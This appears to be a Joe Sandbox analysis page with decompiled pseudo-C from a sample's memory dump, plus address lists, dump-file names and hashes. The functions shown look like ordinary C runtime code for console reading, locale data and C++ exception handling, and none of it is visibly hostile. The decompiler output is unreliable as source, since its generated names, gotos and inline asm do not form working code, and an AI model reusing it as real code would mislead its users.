										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x1f0e18 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E001B0D44();
												} else {
													_t170 = E001B104A();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E001B0EF3(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x1f0e18 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E0019FD24(__eflags))) = 0xc;
									 *(E0019FD11(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E001A71B2(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x1f0e18 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E0019FD11(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E0019FD24(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E0019FD11(_t246)) =  *_t197 & 0x00000000;
					_t139 = E0019FD24(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x001b11e2
0x001b11e6
0x001b11e9
0x001b1203
0x001b1205
0x001b156a
0x001b156a
0x001b156f
0x001b156f
0x001b1577
0x001b157d
0x001b157d
0x00000000
0x001b157d
0x001b120b
0x001b1211
0x00000000
0x00000000
0x001b121b
0x001b1221
0x001b1224
0x001b1227
0x001b1231
0x001b1234
0x001b1237
0x001b123b
0x001b123d
0x00000000
0x00000000
0x001b1243
0x001b1246
0x001b124c
0x001b1266
0x001b1268
0x001b1566
0x00000000
0x001b1566
0x001b126e
0x001b1271
0x00000000
0x00000000
0x001b1277
0x001b127b
0x00000000
0x00000000
0x001b1281
0x001b1284
0x001b1288
0x001b128f
0x001b1291
0x001b1291
0x001b1294
0x001b12e9
0x001b12eb
0x001b12b1
0x001b12b6
0x001b12bd
0x001b12c3
0x00000000
0x001b12ed
0x001b12ef
0x001b12f0
0x001b12f2
0x001b12f5
0x001b12f7
0x001b12f9
0x001b12fb
0x001b12fb
0x001b1306
0x001b1308
0x001b130f
0x001b1314
0x001b1317
0x001b131a
0x001b131c
0x001b1340
0x001b1348
0x001b134b
0x001b1352
0x001b1359
0x001b135d
0x001b135f
0x001b1362
0x001b1369
0x001b1369
0x001b136c
0x001b136e
0x001b1371
0x001b1376
0x001b1379
0x001b1382
0x001b1386
0x001b1389
0x001b138b
0x001b1391
0x001b1393
0x001b139c
0x001b139d
0x001b139f
0x001b13a3
0x001b13a4
0x001b13a8
0x001b13ab
0x001b13b5
0x001b13ba
0x001b13bd
0x001b13cc
0x001b13d0
0x001b13d3
0x001b13d5
0x001b13d7
0x001b13d9
0x001b13de
0x001b13e0
0x001b13e4
0x001b13e5
0x001b13eb
0x001b13f5
0x001b13f6
0x001b13f9
0x001b13fe
0x001b1401
0x001b1410
0x001b1414
0x001b1417
0x001b1419
0x001b141b
0x001b141d
0x001b141f
0x001b1425
0x001b1425
0x001b1426
0x001b1435
0x001b1438
0x001b1439
0x001b1439
0x001b141d
0x001b1419
0x001b1401
0x001b13d9
0x001b13d5
0x001b13bd
0x001b1393
0x001b138b
0x001b143f
0x001b1445
0x001b1447
0x001b14ba
0x001b14ba
0x001b14be
0x001b14ce
0x001b14d4
0x001b14d6
0x001b1532
0x001b1532
0x001b153a
0x001b153b
0x001b153d
0x001b1556
0x001b1559
0x001b1496
0x001b1497
0x00000000
0x001b149c
0x001b155f
0x00000000
0x001b155f
0x001b1544
0x001b154f
0x00000000
0x001b154f
0x001b14d8
0x001b14db
0x001b14de
0x00000000
0x00000000
0x001b14e0
0x001b14e0
0x001b14e3
0x001b14e6
0x001b14e9
0x001b14f0
0x001b14f5
0x001b14f7
0x001b14fb
0x001b1516
0x001b151a
0x001b151b
0x001b151e
0x001b151f
0x001b152b
0x001b1521
0x001b1521
0x001b1521
0x001b14fd
0x001b14fd
0x001b14fd
0x001b1508
0x001b150d
0x001b1510
0x001b1510
0x00000000
0x001b14f5
0x001b144c
0x001b144f
0x001b1456
0x001b145b
0x00000000
0x00000000
0x001b1464
0x001b146a
0x001b146c
0x00000000
0x00000000
0x001b146e
0x001b1472
0x00000000
0x00000000
0x001b1486
0x001b148c
0x001b148e
0x001b14b2
0x001b14b5
0x00000000
0x001b14b5
0x001b1490
0x00000000
0x001b131e
0x001b1323
0x001b132e
0x001b149d
0x001b149d
0x001b149d
0x001b14a0
0x001b14a1
0x00000000
0x001b14a9
0x001b131c
0x001b12eb
0x001b1296
0x001b1299
0x001b12ad
0x001b12af
0x001b12d0
0x001b12d3
0x001b12d6
0x001b12d9
0x00000000
0x001b12d9
0x00000000
0x001b129b
0x001b129b
0x001b129e
0x001b12a1
0x00000000
0x001b12a1
0x001b1299
0x001b124e
0x001b1253
0x001b125b
0x00000000
0x001b11eb
0x001b11f0
0x001b11f3
0x001b11f8
0x001b1582
0x00000000
0x001b1582

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6315ca98042b0e26c5ef73f07adab61418fa77eac8b454c27f7108eddc218d1
Instruction ID: 6c4576659d0b8b60d4d7bad04a0f200bbd5d80dcffb7ac13b79380c40f300464
Opcode Fuzzy Hash: d6315ca98042b0e26c5ef73f07adab61418fa77eac8b454c27f7108eddc218d1
Instruction Fuzzy Hash: E0C1D171A04249BFDF25DF98D8A0BFD7BB5BF5A310F564169F801A7292C7309942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001AE134 Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E001AE134(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E001A58A2(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E001A871A(4);
						_t120 = 0;
						_v8 = _t125;
						E001A71B2(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x1c3070; // 0x1c30c4
								 *_t93 = _t53;
								_t54 =  *0x1c3074; // 0x1f0a5c
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x1c3078; // 0x1f0a5c
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x1c30a0; // 0x1c30c8
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x1c30a4; // 0x1f0a60
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E001A871A(4);
							_v12 = _t121;
							E001A71B2(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t69 = E001AB24B(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E001AB24B(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t74 = E001AB24B(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
								_t77 = E001AB24B(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E001AB24B(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E001AE0CB(_t93);
								E001A71B2(_t93);
								E001A71B2(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E001A71B2(_v8);
								return _v16;
							}
							E001A71B2();
							goto L12;
						}
						E001A71B2(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x1c3070;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E001A71B2( *((intOrPtr*)(_t123 + 0x7c)));
							E001A71B2( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x001ae134
0x001ae13e
0x001ae144
0x001ae147
0x001ae150
0x001ae16f
0x001ae177
0x001ae17d
0x001ae190
0x001ae191
0x001ae19a
0x001ae19c
0x001ae19f
0x001ae1a2
0x001ae1ab
0x001ae1bc
0x001ae1be
0x001ae1c7
0x001ae316
0x001ae31b
0x001ae31d
0x001ae322
0x001ae325
0x001ae32a
0x001ae32d
0x001ae332
0x001ae335
0x001ae33a
0x001ae2a9
0x001ae2af
0x001ae2b3
0x001ae2b5
0x001ae2b5
0x00000000
0x001ae2b3
0x001ae1d4
0x001ae1d8
0x001ae1db
0x001ae1e2
0x001ae1e5
0x001ae1f2
0x001ae1f8
0x001ae204
0x001ae209
0x001ae218
0x001ae21f
0x001ae22c
0x001ae240
0x001ae24a
0x001ae261
0x001ae28d
0x001ae29d
0x001ae29d
0x001ae2a1
0x00000000
0x00000000
0x001ae292
0x001ae292
0x001ae298
0x001ae304
0x001ae29c
0x001ae29c
0x00000000
0x001ae29c
0x001ae306
0x001ae308
0x001ae308
0x001ae30b
0x001ae30d
0x001ae310
0x00000000
0x001ae314
0x001ae29a
0x00000000
0x001ae29a
0x001ae2a3
0x001ae2a6
0x00000000
0x001ae2a6
0x001ae264
0x001ae26a
0x001ae272
0x001ae27a
0x001ae27e
0x001ae282
0x00000000
0x001ae28a
0x001ae1e7
0x00000000
0x001ae1ec
0x001ae1ae
0x00000000
0x001ae1b6
0x00000000
0x001ae15a
0x001ae15a
0x001ae15c
0x001ae15f
0x001ae2b7
0x001ae2b7
0x001ae2bf
0x001ae2c1
0x001ae2c1
0x001ae2c9
0x001ae2ce
0x001ae2d2
0x001ae2d7
0x001ae2e2
0x001ae2e8
0x001ae2d2
0x001ae2ec
0x001ae2f1
0x001ae2f7
0x00000000
0x001ae2f7

APIs

_free.LIBCMT ref: 001AE1A2
_free.LIBCMT ref: 001AE1AE
_free.LIBCMT ref: 001AE2D7
_free.LIBCMT ref: 001AE2E2

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 62dbbae376b304b3413ce70750c336f80b076dcefc8d66007fdab6ca94ca1fe6
Instruction ID: 72dc9cd8c2d4275074f98271c6007343c8896b1b13f9bbd35384be0123a3bde7
Opcode Fuzzy Hash: 62dbbae376b304b3413ce70750c336f80b076dcefc8d66007fdab6ca94ca1fe6
Instruction Fuzzy Hash: D261C57A9043059FDB20DF68C841BAABBF9BF56710F10455AF955EB282E770AD40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0019B5A8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E0019B5A8(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E0019C520(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E001A24F9(_t270, _t275, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_t202 = E0019B22C(_t271, _t275, _t296, _t301, _t315, _t301, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E0019B22C(_t271, _t275, _t296, 0, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E001994C6(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E001993F9(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E0019B528(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E001A24F9(_t271, _t275, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E0019B22C(_t270, _t275, _t296, _t301, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E0019B22C(_t270, _t275, _t296, _t301, 0) + 0x10);
								_t259 = E0019B22C(_t270, _t275, _t296, _t301, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E0019B22C(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E001993F9(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E0019B528(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E001997C3(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E0019B22C(_t270, _t275, _t296, _t301, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E0019BFBD(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E0019B22C(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
																	_t237 = E0019B22C(_t270, _t275, _t296, _t301, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E0019B22C(_t270, _t275, _t296, _t301, _t315) + 0x1c));
										_t264 = E0019B22C(_t270, _t275, _t296, _t301, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E0019BFBD(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E001A50FC(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E0019BC46( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x1efe4c) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E001997C3(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E0019BC2E( &_v64);
											E0019938D( &_v64, 0x1c21a4);
											L64:
